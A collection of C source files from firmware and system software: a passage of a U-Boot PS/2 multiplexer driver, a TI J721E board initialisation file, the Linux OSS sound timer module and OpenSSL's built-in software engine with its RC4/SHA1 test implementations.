byte; ps2mult_buf_in_idx &= (PS2BUF_SIZE - 1); atomic_inc(&ps2mult_buf_cnt); } else { PRINTF("buffer overflow\n"); } if (received_bsync) { PRINTF("unexpected BSYNC\n"); received_bsync = 0; } } void ps2mult_callback (int in_cnt) { int i; u_char byte; static int keyb_handler_active = 0; if (!init_done) { return; } for (i = 0; i < in_cnt; i ++) { byte = ps2ser_getc(); if (received_escape) { ps2mult_receive_byte(byte, received_selector); received_escape = 0; } else switch (byte) { case PS2MULT_ESCAPE: PRINTF_MULT("ESCAPE receive\n"); received_escape = 1; break; case PS2MULT_BSYNC: PRINTF_MULT("BSYNC receive\n"); received_bsync = 1; break; case PS2MULT_KB_SELECTOR: case PS2MULT_MS_SELECTOR: PRINTF_MULT("%s receive\n", byte == PS2MULT_KB_SELECTOR ? "KB_SEL" : "MS_SEL"); received_selector = byte; break; case PS2MULT_SESSION_START: case PS2MULT_SESSION_END: PRINTF_MULT("%s receive\n", byte == PS2MULT_SESSION_START ? 
"SESSION_START" : "SESSION_END"); break; default: ps2mult_receive_byte(byte, received_selector); } } if (keyb_handler && !keyb_handler_active && atomic_read(&ps2mult_buf_cnt)) { keyb_handler_active = 1; keyb_handler(NULL); keyb_handler_active = 0; } } u_char ps2mult_read_status(void) { u_char byte; if (atomic_read(&ps2mult_buf_cnt) == 0) { ps2ser_check(); } if (atomic_read(&ps2mult_buf_cnt)) { byte = ps2mult_buf_status[ps2mult_buf_out_idx]; } else { byte = KBD_STAT_DEFAULT; } PRINTF_KEYB("read_status()=0x%02x\n", byte); return byte; } u_char ps2mult_read_input(void) { u_char byte = 0; if (atomic_read(&ps2mult_buf_cnt) == 0) { ps2ser_check(); } if (atomic_read(&ps2mult_buf_cnt)) { byte = ps2mult_buf[ps2mult_buf_out_idx++]; ps2mult_buf_out_idx &= (PS2BUF_SIZE - 1); atomic_dec(&ps2mult_buf_cnt); } PRINTF_KEYB("read_input()=0x%02x\n", byte); return byte; } void ps2mult_write_output(u_char val) { int i; PRINTF_KEYB("write_output(0x%02x)\n", val); for (i = 0; i < KBD_TIMEOUT; i++) { if (!kbd_command_active && !mouse_command_active) { break; } udelay(1000); ps2ser_check(); } if (kbd_command_active) { PRINTF("keyboard command not acknoledged\n"); kbd_command_active = 0; } if (mouse_command_active) { PRINTF("mouse command not acknoledged\n"); mouse_command_active = 0; } if (ctl_command_active) { switch (ctl_command_active) { case KBD_CCMD_WRITE_MODE: /* Scan code conversion not supported */ command_byte = val & ~KBD_MODE_KCC; break; case KBD_CCMD_WRITE_AUX_OBUF: ps2mult_receive_byte(val, PS2MULT_MS_SELECTOR); break; case KBD_CCMD_WRITE_MOUSE: ps2mult_send_byte(val, PS2MULT_MS_SELECTOR); break; default: PRINTF("invalid controller command\n"); break; } ctl_command_active = 0; return; } ps2mult_send_byte(val, PS2MULT_KB_SELECTOR); } void ps2mult_write_command(u_char val) { ctl_command_active = 0; PRINTF_KEYB("write_command(0x%02x)\n", val); switch (val) { case KBD_CCMD_READ_MODE: ps2mult_receive_byte(command_byte, PS2MULT_KB_SELECTOR); break; case KBD_CCMD_WRITE_MODE: 
ctl_command_active = val; break; case KBD_CCMD_MOUSE_DISABLE: break; case KBD_CCMD_MOUSE_ENABLE: break; case KBD_CCMD_SELF_TEST: ps2mult_receive_byte(0x55, PS2MULT_KB_SELECTOR); break; case KBD_CCMD_KBD_TEST: ps2mult_receive_byte(0x00, PS2MULT_KB_SELECTOR); break; case KBD_CCMD_KBD_DISABLE: break; case KBD_CCMD_KBD_ENABLE: break; case KBD_CCMD_WRITE_AUX_OBUF: ctl_command_active = val; break; case KBD_CCMD_WRITE_MOUSE: ctl_command_active = val; break; default: PRINTF("invalid controller command\n"); break; } } static int ps2mult_getc_w (void) { int res = -1; int i; for (i = 0; i < KBD_TIMEOUT; i++) { if (ps2ser_check()) { res = ps2ser_getc(); break; } udelay(1000); } switch (res) { case PS2MULT_KB_SELECTOR: case PS2MULT_MS_SELECTOR: received_selector = res; break; default: break; } return res; } int ps2mult_init (void) { int byte; int kbd_found = 0; int mouse_found = 0; while (get_timer(start_time) < CONFIG_PS2MULT_DELAY); ps2ser_init(); ps2ser_putc(PS2MULT_SESSION_START); ps2ser_putc(PS2MULT_KB_SELECTOR); ps2ser_putc(KBD_CMD_RESET); do { byte = ps2mult_getc_w(); } while (byte >= 0 && byte != KBD_REPLY_ACK); if (byte == KBD_REPLY_ACK) { byte = ps2mult_getc_w(); if (byte == 0xaa) { kbd_found = 1; puts("keyboard"); } } if (!kbd_found) { while (byte >= 0) { byte = ps2mult_getc_w(); } } #if 1 /* detect mouse */ ps2ser_putc(PS2MULT_MS_SELECTOR); ps2ser_putc(AUX_RESET); do { byte = ps2mult_getc_w(); } while (byte >= 0 && byte != AUX_ACK); if (byte == AUX_ACK) { byte = ps2mult_getc_w(); if (byte == 0xaa) { byte = ps2mult_getc_w(); if (byte == 0x00) { mouse_found = 1; puts(", mouse"); } } } if (!mouse_found) { while (byte >= 0) { byte = ps2mult_getc_w(); } } #endif if (mouse_found || kbd_found) { if (!received_selector) { if (mouse_found) { received_selector = PS2MULT_MS_SELECTOR; } else { received_selector = PS2MULT_KB_SELECTOR; } } init_done = 1; } else { puts("No device found"); } puts("\n"); #if 0 /* for testing */ { int i; u_char key[] = { 0x1f, 0x12, 0x14, 0x12, 0x31, 
0x2f, 0x39, /* setenv */ 0x1f, 0x14, 0x20, 0x17, 0x31, 0x39, /* stdin */ 0x1f, 0x12, 0x13, 0x17, 0x1e, 0x26, 0x1c, /* serial */ }; for (i = 0; i < sizeof (key); i++) { ps2mult_receive_byte (key[i], PS2MULT_KB_SELECTOR); ps2mult_receive_byte (key[i] | 0x80, PS2MULT_KB_SELECTOR); } } #endif return init_done ? 0 : -1; } int ps2mult_request_irq(void (*handler)(void *)) { keyb_handler = handler; return 0; }
{ "language": "C" }
// SPDX-License-Identifier: GPL-2.0+ /* * Board specific initialization for J721E EVM * * Copyright (C) 2018-2019 Texas Instruments Incorporated - http://www.ti.com/ * Lokesh Vutla <lokeshvutla@ti.com> * */ #include <common.h> #include <init.h> #include <asm/io.h> #include <spl.h> #include <asm/arch/sys_proto.h> DECLARE_GLOBAL_DATA_PTR; int board_init(void) { return 0; } int dram_init(void) { #ifdef CONFIG_PHYS_64BIT gd->ram_size = 0x100000000; #else gd->ram_size = 0x80000000; #endif return 0; } ulong board_get_usable_ram_top(ulong total_size) { #ifdef CONFIG_PHYS_64BIT /* Limit RAM used by U-Boot to the DDR low region */ if (gd->ram_top > 0x100000000) return 0x100000000; #endif return gd->ram_top; } int dram_init_banksize(void) { /* Bank 0 declares the memory available in the DDR low region */ gd->bd->bi_dram[0].start = CONFIG_SYS_SDRAM_BASE; gd->bd->bi_dram[0].size = 0x80000000; gd->ram_size = 0x80000000; #ifdef CONFIG_PHYS_64BIT /* Bank 1 declares the memory available in the DDR high region */ gd->bd->bi_dram[1].start = CONFIG_SYS_SDRAM_BASE1; gd->bd->bi_dram[1].size = 0x80000000; gd->ram_size = 0x100000000; #endif return 0; } #ifdef CONFIG_SPL_LOAD_FIT int board_fit_config_name_match(const char *name) { if (!strcmp(name, "k3-j721e-common-proc-board")) return 0; return -1; } #endif #if defined(CONFIG_OF_LIBFDT) && defined(CONFIG_OF_BOARD_SETUP) int ft_board_setup(void *blob, bd_t *bd) { int ret; ret = fdt_fixup_msmc_ram(blob, "/interconnect@100000", "sram@70000000"); if (ret) printf("%s: fixing up msmc ram failed %d\n", __func__, ret); return ret; } #endif
{ "language": "C" }
/*
 * sound/oss/sound_timer.c
 */
/*
 * Copyright (C) by Hannu Savolainen 1993-1997
 *
 * OSS/Free for Linux is distributed under the GNU GENERAL PUBLIC LICENSE (GPL)
 * Version 2 (June 1991). See the "COPYING" file distributed with this software
 * for more info.
 */
/*
 * Thomas Sailer   : ioctl code reworked (vmalloc/vfree removed)
 */
#include <linux/string.h>
#include <linux/spinlock.h>

#include "sound_config.h"

/* Module state: one hardware timer serves the whole sequencer. */
static volatile int initialized, opened, tmr_running;
/* Hardware-tick bookkeeping: tmr_ctr counts ticks since the last tempo
 * or rate change; tmr_offs/ticks_offs preserve the totals across such
 * changes so curr_ticks stays monotonic. */
static volatile unsigned int tmr_offs, tmr_ctr;
static volatile unsigned long ticks_offs;
static volatile int curr_tempo, curr_timebase;
static volatile unsigned long curr_ticks;
static volatile unsigned long next_event_time;
static unsigned long prev_event_time;
static volatile unsigned long usecs_per_tmr;	/* Length of the current interval */

static struct sound_lowlev_timer *tmr;
static DEFINE_SPINLOCK(lock);

/* Convert a count of hardware timer ticks into MIDI ticks, rounding to
 * the nearest MIDI tick at the current tempo/timebase. */
static unsigned long tmr2ticks(int tmr_value)
{
	/*
	 *	Convert timer ticks to MIDI ticks
	 */
	unsigned long tmp;
	unsigned long scale;

	tmp = tmr_value * usecs_per_tmr;	/* Convert to usecs */
	scale = (60 * 1000000) / (curr_tempo * curr_timebase);	/* usecs per MIDI tick */
	return (tmp + (scale / 2)) / scale;
}

/* Restart the low-level timer at the rate implied by the current tempo
 * and timebase, clamped to at most 500 Hz. */
void reprogram_timer(void)
{
	unsigned long   usecs_per_tick;

	/*
	 *	The user is changing the timer rate before setting a timer
	 *	slap, bad bad not allowed.
	 */
	if(!tmr)
		return;
	usecs_per_tick = (60 * 1000000) / (curr_tempo * curr_timebase);

	/*
	 * Don't kill the system by setting too high timer rate
	 */
	if (usecs_per_tick < 2000)
		usecs_per_tick = 2000;

	/* The hardware reports the interval it actually programmed */
	usecs_per_tmr = tmr->tmr_start(tmr->dev, usecs_per_tick);
}

/* Fold the ticks counted so far into the offsets, then switch to the
 * new hardware interval so past time is not re-scaled. */
void sound_timer_syncinterval(unsigned int new_usecs)
{
	/*
	 *	This routine is called by the hardware level if
	 *	the clock frequency has changed for some reason.
	 */
	tmr_offs = tmr_ctr;
	ticks_offs += tmr2ticks(tmr_ctr);
	tmr_ctr = 0;
	usecs_per_tmr = new_usecs;
}
EXPORT_SYMBOL(sound_timer_syncinterval);

/* Zero all timing state under the lock; next_event_time of (ulong)-1
 * means "no event armed". */
static void tmr_reset(void)
{
	unsigned long flags;

	spin_lock_irqsave(&lock,flags);
	tmr_offs = 0;
	ticks_offs = 0;
	tmr_ctr = 0;
	next_event_time = (unsigned long) -1;
	prev_event_time = 0;
	curr_ticks = 0;
	spin_unlock_irqrestore(&lock,flags);
}

/* Open the (exclusive) timer device: reset state, set the default
 * tempo 60 / timebase 100, and start the hardware timer. */
static int timer_open(int dev, int mode)
{
	if (opened)
		return -EBUSY;
	tmr_reset();
	curr_tempo = 60;
	curr_timebase = 100;
	opened = 1;
	reprogram_timer();
	return 0;
}

/* Stop the timer and release the device. */
static void timer_close(int dev)
{
	opened = tmr_running = 0;
	tmr->tmr_disable(tmr->dev);
}

/* Handle a sequencer timer event record.  Returns TIMER_ARMED when a
 * future wait was scheduled, TIMER_NOT_ARMED otherwise. */
static int timer_event(int dev, unsigned char *event)
{
	unsigned char cmd = event[1];
	unsigned long parm = *(int *) &event[4];

	switch (cmd)
	{
		case TMR_WAIT_REL:
			/* Relative wait: convert to absolute ... */
			parm += prev_event_time;
			/* fall through */
		case TMR_WAIT_ABS:
			if (parm > 0)
			{
				long time;

				if (parm <= curr_ticks)	/* It's the time */
					return TIMER_NOT_ARMED;

				time = parm;
				next_event_time = prev_event_time = time;

				return TIMER_ARMED;
			}
			break;

		case TMR_START:
			tmr_reset();
			tmr_running = 1;
			reprogram_timer();
			break;

		case TMR_STOP:
			tmr_running = 0;
			break;

		case TMR_CONTINUE:
			tmr_running = 1;
			reprogram_timer();
			break;

		case TMR_TEMPO:
			/* Clamp tempo to [8, 250] BPM and rebase the tick
			 * counters so elapsed time is unaffected. */
			if (parm)
			{
				if (parm < 8)
					parm = 8;
				if (parm > 250)
					parm = 250;
				tmr_offs = tmr_ctr;
				ticks_offs += tmr2ticks(tmr_ctr);
				tmr_ctr = 0;
				curr_tempo = parm;
				reprogram_timer();
			}
			break;

		case TMR_ECHO:
			/* Bounce the event back to the input queue */
			seq_copy_to_input(event, 8);
			break;

		default:;
	}
	return TIMER_NOT_ARMED;
}

/* Current time in MIDI ticks (0 when the device is closed). */
static unsigned long timer_get_time(int dev)
{
	if (!opened)
		return 0;
	return curr_ticks;
}

/* ioctl interface: query/set tempo, timebase, and transport state.
 * Returns 0/-errno; value-returning commands copy out through *p. */
static int timer_ioctl(int dev, unsigned int cmd, void __user *arg)
{
	int __user *p = arg;
	int val;

	switch (cmd)
	{
		case SNDCTL_TMR_SOURCE:
			val = TMR_INTERNAL;
			break;

		case SNDCTL_TMR_START:
			tmr_reset();
			tmr_running = 1;
			return 0;

		case SNDCTL_TMR_STOP:
			tmr_running = 0;
			return 0;

		case SNDCTL_TMR_CONTINUE:
			tmr_running = 1;
			return 0;

		case SNDCTL_TMR_TIMEBASE:
			/* 0 = query only; otherwise clamp to [1, 1000] */
			if (get_user(val, p))
				return -EFAULT;
			if (val)
			{
				if (val < 1)
					val = 1;
				if (val > 1000)
					val = 1000;
				curr_timebase = val;
			}
			val = curr_timebase;
			break;

		case SNDCTL_TMR_TEMPO:
			/* 0 = query only; otherwise clamp to [8, 250] and
			 * rebase counters as in TMR_TEMPO above. */
			if (get_user(val, p))
				return -EFAULT;
			if (val)
			{
				if (val < 8)
					val = 8;
				if (val > 250)
					val = 250;
				tmr_offs = tmr_ctr;
				ticks_offs += tmr2ticks(tmr_ctr);
				tmr_ctr = 0;
				curr_tempo = val;
				reprogram_timer();
			}
			val = curr_tempo;
			break;

		case SNDCTL_SEQ_CTRLRATE:
			if (get_user(val, p))
				return -EFAULT;
			if (val != 0)	/* Can't change */
				return -EINVAL;
			/* Report ticks per second, rounded */
			val = ((curr_tempo * curr_timebase) + 30) / 60;
			break;

		case SNDCTL_SEQ_GETTIME:
			val = curr_ticks;
			break;

		case SNDCTL_TMR_METRONOME:
		default:
			return -EINVAL;
	}
	return put_user(val, p);
}

/* Arm the timer for an absolute tick; negative time means "as soon as
 * possible", past times are ignored. */
static void timer_arm(int dev, long time)
{
	if (time < 0)
		time = curr_ticks + 1;
	else if (time <= curr_ticks)	/* It's the time */
		return;

	next_event_time = prev_event_time = time;
	return;
}

static struct sound_timer_operations sound_timer =
{
	.owner		= THIS_MODULE,
	.info		= {"Sound Timer", 0},
	.priority	= 1,	/* Priority */
	.devlink	= 0,	/* Local device link */
	.open		= timer_open,
	.close		= timer_close,
	.event		= timer_event,
	.get_time	= timer_get_time,
	.ioctl		= timer_ioctl,
	.arm_timer	= timer_arm
};

/* Hardware tick handler: restart the low-level timer, advance the MIDI
 * clock, and kick the sequencer when an armed event comes due. */
void sound_timer_interrupt(void)
{
	unsigned long flags;

	if (!opened)
		return;

	tmr->tmr_restart(tmr->dev);

	if (!tmr_running)
		return;

	spin_lock_irqsave(&lock,flags);
	tmr_ctr++;
	curr_ticks = ticks_offs + tmr2ticks(tmr_ctr);

	if (curr_ticks >= next_event_time)
	{
		next_event_time = (unsigned long) -1;
		sequencer_timer(0);
	}
	spin_unlock_irqrestore(&lock,flags);
}
EXPORT_SYMBOL(sound_timer_interrupt);

/* Register a low-level timer.  A later registration replaces the
 * current one only if it has a strictly higher priority; the first one
 * also allocates (or takes over) a sequencer timer device slot. */
void sound_timer_init(struct sound_lowlev_timer *t, char *name)
{
	int n;

	if (initialized)
	{
		if (t->priority <= tmr->priority)
			return;	/* There is already a similar or better timer */
		tmr = t;
		return;
	}
	initialized = 1;
	tmr = t;

	n = sound_alloc_timerdev();
	if (n == -1)
		n = 0;	/* Overwrite the system timer */
	strlcpy(sound_timer.info.name, name, sizeof(sound_timer.info.name));
	sound_timer_devs[n] = &sound_timer;
}
EXPORT_SYMBOL(sound_timer_init);
{ "language": "C" }
/* crypto/engine/eng_openssl.c */ /* Written by Geoff Thorpe (geoff@geoffthorpe.net) for the OpenSSL * project 2000. */ /* ==================================================================== * Copyright (c) 1999-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * licensing@OpenSSL.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* ==================================================================== * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED. * ECDH support in OpenSSL originally developed by * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project. */ #include <stdio.h> #include <openssl/crypto.h> #include "cryptlib.h" #include <openssl/engine.h> #include <openssl/dso.h> #include <openssl/pem.h> #include <openssl/evp.h> #include <openssl/rand.h> #ifndef OPENSSL_NO_RSA #include <openssl/rsa.h> #endif #ifndef OPENSSL_NO_DSA #include <openssl/dsa.h> #endif #ifndef OPENSSL_NO_DH #include <openssl/dh.h> #endif /* This testing gunk is implemented (and explained) lower down. It also assumes * the application explicitly calls "ENGINE_load_openssl()" because this is no * longer automatic in ENGINE_load_builtin_engines(). 
 */
/* Which test implementations to compile in (see comment above) */
#define TEST_ENG_OPENSSL_RC4
#define TEST_ENG_OPENSSL_PKEY
/* #define TEST_ENG_OPENSSL_RC4_OTHERS */
#define TEST_ENG_OPENSSL_RC4_P_INIT
/* #define TEST_ENG_OPENSSL_RC4_P_CIPHER */
#define TEST_ENG_OPENSSL_SHA
/* #define TEST_ENG_OPENSSL_SHA_OTHERS */
/* #define TEST_ENG_OPENSSL_SHA_P_INIT */
/* #define TEST_ENG_OPENSSL_SHA_P_UPDATE */
/* #define TEST_ENG_OPENSSL_SHA_P_FINAL */

/* Now check what of those algorithms are actually enabled */
#ifdef OPENSSL_NO_RC4
#undef TEST_ENG_OPENSSL_RC4
#undef TEST_ENG_OPENSSL_RC4_OTHERS
#undef TEST_ENG_OPENSSL_RC4_P_INIT
#undef TEST_ENG_OPENSSL_RC4_P_CIPHER
#endif
#if defined(OPENSSL_NO_SHA) || defined(OPENSSL_NO_SHA0) || defined(OPENSSL_NO_SHA1)
#undef TEST_ENG_OPENSSL_SHA
#undef TEST_ENG_OPENSSL_SHA_OTHERS
#undef TEST_ENG_OPENSSL_SHA_P_INIT
#undef TEST_ENG_OPENSSL_SHA_P_UPDATE
#undef TEST_ENG_OPENSSL_SHA_P_FINAL
#endif

/* Forward declarations of the ENGINE callback implementations below */
#ifdef TEST_ENG_OPENSSL_RC4
static int openssl_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
				const int **nids, int nid);
#endif
#ifdef TEST_ENG_OPENSSL_SHA
static int openssl_digests(ENGINE *e, const EVP_MD **digest,
				const int **nids, int nid);
#endif
#ifdef TEST_ENG_OPENSSL_PKEY
static EVP_PKEY *openssl_load_privkey(ENGINE *eng, const char *key_id,
				UI_METHOD *ui_method, void *callback_data);
#endif

/* The constants used when creating the ENGINE */
static const char *engine_openssl_id = "openssl";
static const char *engine_openssl_name = "Software engine support";

/* This internal function is used by ENGINE_openssl() and possibly by the
 * "dynamic" ENGINE support too */
static int bind_helper(ENGINE *e)
	{
	/* Install id/name and the default software method for each
	 * algorithm family compiled in; any single failure aborts. */
	if(!ENGINE_set_id(e, engine_openssl_id)
			|| !ENGINE_set_name(e, engine_openssl_name)
#ifndef TEST_ENG_OPENSSL_NO_ALGORITHMS
#ifndef OPENSSL_NO_RSA
			|| !ENGINE_set_RSA(e, RSA_get_default_method())
#endif
#ifndef OPENSSL_NO_DSA
			|| !ENGINE_set_DSA(e, DSA_get_default_method())
#endif
#ifndef OPENSSL_NO_ECDH
			|| !ENGINE_set_ECDH(e, ECDH_OpenSSL())
#endif
#ifndef OPENSSL_NO_ECDSA
			|| !ENGINE_set_ECDSA(e, ECDSA_OpenSSL())
#endif
#ifndef OPENSSL_NO_DH
			|| !ENGINE_set_DH(e, DH_get_default_method())
#endif
			|| !ENGINE_set_RAND(e, RAND_SSLeay())
#ifdef TEST_ENG_OPENSSL_RC4
			|| !ENGINE_set_ciphers(e, openssl_ciphers)
#endif
#ifdef TEST_ENG_OPENSSL_SHA
			|| !ENGINE_set_digests(e, openssl_digests)
#endif
#endif
#ifdef TEST_ENG_OPENSSL_PKEY
			|| !ENGINE_set_load_privkey_function(e, openssl_load_privkey)
#endif
			)
		return 0;
	/* If we add errors to this ENGINE, ensure the error handling is setup here */
	/* openssl_load_error_strings(); */
	return 1;
	}

/* Allocate and bind a fresh "openssl" ENGINE; NULL on failure. */
static ENGINE *engine_openssl(void)
	{
	ENGINE *ret = ENGINE_new();
	if(!ret)
		return NULL;
	if(!bind_helper(ret))
		{
		ENGINE_free(ret);
		return NULL;
		}
	return ret;
	}

/* Create the ENGINE and add it to the global ENGINE list. */
void ENGINE_load_openssl(void)
	{
	ENGINE *toadd = engine_openssl();
	if(!toadd) return;
	ENGINE_add(toadd);
	/* If the "add" worked, it gets a structural reference. So either way,
	 * we release our just-created reference. */
	ENGINE_free(toadd);
	ERR_clear_error();
	}

/* This stuff is needed if this ENGINE is being compiled into a self-contained
 * shared-library. */
#ifdef ENGINE_DYNAMIC_SUPPORT
/* Entry point used by the dynamic ENGINE loader: only bind when the
 * requested id matches (or no id was requested). */
static int bind_fn(ENGINE *e, const char *id)
	{
	if(id && (strcmp(id, engine_openssl_id) != 0))
		return 0;
	if(!bind_helper(e))
		return 0;
	return 1;
	}
IMPLEMENT_DYNAMIC_CHECK_FN()
IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
#endif /* ENGINE_DYNAMIC_SUPPORT */

#ifdef TEST_ENG_OPENSSL_RC4
/* This section of code compiles an "alternative implementation" of two modes of
 * RC4 into this ENGINE. The result is that EVP_CIPHER operation for "rc4"
 * should under normal circumstances go via this support rather than the default
 * EVP support. There are other symbols to tweak the testing;
 *    TEST_ENC_OPENSSL_RC4_OTHERS - print a one line message to stderr each time
 *        we're asked for a cipher we don't support (should not happen).
 *    TEST_ENG_OPENSSL_RC4_P_INIT - print a one line message to stderr each time
 *        the "init_key" handler is called.
 *    TEST_ENG_OPENSSL_RC4_P_CIPHER - ditto for the "cipher" handler.
 */
#include <openssl/rc4.h>
#define TEST_RC4_KEY_SIZE		16
static int test_cipher_nids[] = {NID_rc4,NID_rc4_40};
static int test_cipher_nids_number = 2;
/* Per-context state: the raw key plus the expanded RC4 schedule */
typedef struct {
	unsigned char key[TEST_RC4_KEY_SIZE];
	RC4_KEY ks;
	} TEST_RC4_KEY;
/* Shorthand for this cipher's private data inside an EVP_CIPHER_CTX */
#define test(ctx) ((TEST_RC4_KEY *)(ctx)->cipher_data)
/* EVP "init_key" handler: copy the key and build the RC4 schedule.
 * The key length comes from the ctx, so both rc4 and rc4_40 share it. */
static int test_rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
			const unsigned char *iv, int enc)
	{
#ifdef TEST_ENG_OPENSSL_RC4_P_INIT
	fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) test_init_key() called\n");
#endif
	memcpy(&test(ctx)->key[0],key,EVP_CIPHER_CTX_key_length(ctx));
	RC4_set_key(&test(ctx)->ks,EVP_CIPHER_CTX_key_length(ctx),
		test(ctx)->key);
	return 1;
	}
/* EVP "do_cipher" handler: RC4 is symmetric, so one call handles both
 * encryption and decryption. */
static int test_rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
			const unsigned char *in, unsigned int inl)
	{
#ifdef TEST_ENG_OPENSSL_RC4_P_CIPHER
	fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) test_cipher() called\n");
#endif
	RC4(&test(ctx)->ks,inl,in,out);
	return 1;
	}
static const EVP_CIPHER test_r4_cipher=
	{
	NID_rc4,
	1,TEST_RC4_KEY_SIZE,0,
	EVP_CIPH_VARIABLE_LENGTH,
	test_rc4_init_key,
	test_rc4_cipher,
	NULL,
	sizeof(TEST_RC4_KEY),
	NULL,
	NULL,
	NULL,
	NULL
	};
static const EVP_CIPHER test_r4_40_cipher=
	{
	NID_rc4_40,
	1,5 /* 40 bit */,0,
	EVP_CIPH_VARIABLE_LENGTH,
	test_rc4_init_key,
	test_rc4_cipher,
	NULL,
	sizeof(TEST_RC4_KEY),
	NULL,
	NULL,
	NULL,
	NULL
	};
/* ENGINE_set_ciphers() callback: list supported nids when cipher is
 * NULL, otherwise hand back the implementation for the requested nid. */
static int openssl_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
			const int **nids, int nid)
	{
	if(!cipher)
		{
		/* We are returning a list of supported nids */
		*nids = test_cipher_nids;
		return test_cipher_nids_number;
		}
	/* We are being asked for a specific cipher */
	if(nid == NID_rc4)
		*cipher = &test_r4_cipher;
	else if(nid == NID_rc4_40)
		*cipher = &test_r4_40_cipher;
	else
		{
#ifdef TEST_ENG_OPENSSL_RC4_OTHERS
		fprintf(stderr, "(TEST_ENG_OPENSSL_RC4) returning NULL for "
			"nid %d\n", nid);
#endif
		*cipher = NULL;
		return 0;
		}
	return 1;
	}
#endif

#ifdef TEST_ENG_OPENSSL_SHA
/* Much the same sort of comment as for TEST_ENG_OPENSSL_RC4 */
#include <openssl/sha.h>
static int test_digest_nids[] = {NID_sha1};
static int test_digest_nids_number = 1;
/* EVP_MD handlers that simply forward to the low-level SHA1_* API,
 * optionally tracing each call to stderr. */
static int test_sha1_init(EVP_MD_CTX *ctx)
	{
#ifdef TEST_ENG_OPENSSL_SHA_P_INIT
	fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_init() called\n");
#endif
	return SHA1_Init(ctx->md_data);
	}
static int test_sha1_update(EVP_MD_CTX *ctx,const void *data,size_t count)
	{
#ifdef TEST_ENG_OPENSSL_SHA_P_UPDATE
	fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_update() called\n");
#endif
	return SHA1_Update(ctx->md_data,data,count);
	}
static int test_sha1_final(EVP_MD_CTX *ctx,unsigned char *md)
	{
#ifdef TEST_ENG_OPENSSL_SHA_P_FINAL
	fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) test_sha1_final() called\n");
#endif
	return SHA1_Final(md,ctx->md_data);
	}
static const EVP_MD test_sha_md=
	{
	NID_sha1,
	NID_sha1WithRSAEncryption,
	SHA_DIGEST_LENGTH,
	0,
	test_sha1_init,
	test_sha1_update,
	test_sha1_final,
	NULL,
	NULL,
	EVP_PKEY_RSA_method,
	SHA_CBLOCK,
	sizeof(EVP_MD *)+sizeof(SHA_CTX),
	};
/* ENGINE_set_digests() callback: same list-or-lookup protocol as
 * openssl_ciphers() above. */
static int openssl_digests(ENGINE *e, const EVP_MD **digest,
			const int **nids, int nid)
	{
	if(!digest)
		{
		/* We are returning a list of supported nids */
		*nids = test_digest_nids;
		return test_digest_nids_number;
		}
	/* We are being asked for a specific digest */
	if(nid == NID_sha1)
		*digest = &test_sha_md;
	else
		{
#ifdef TEST_ENG_OPENSSL_SHA_OTHERS
		fprintf(stderr, "(TEST_ENG_OPENSSL_SHA) returning NULL for "
			"nid %d\n", nid);
#endif
		*digest = NULL;
		return 0;
		}
	return 1;
	}
#endif

#ifdef TEST_ENG_OPENSSL_PKEY
/* Load a PEM private key from the file named by key_id.  Returns a new
 * EVP_PKEY or NULL.  NOTE(review): ui_method/callback_data are ignored,
 * so an encrypted key would fall back to PEM's default prompt. */
static EVP_PKEY *openssl_load_privkey(ENGINE *eng, const char *key_id, UI_METHOD *ui_method,
	void *callback_data)
	{
	BIO *in;
	EVP_PKEY *key;
	fprintf(stderr, "(TEST_ENG_OPENSSL_PKEY)Loading Private key %s\n",
		key_id);
	in = BIO_new_file(key_id, "r");
	if (!in)
		return NULL;
	key = PEM_read_bio_PrivateKey(in, NULL, 0, NULL);
	BIO_free(in);
	return key;
	}
#endif
{ "language": "C" }
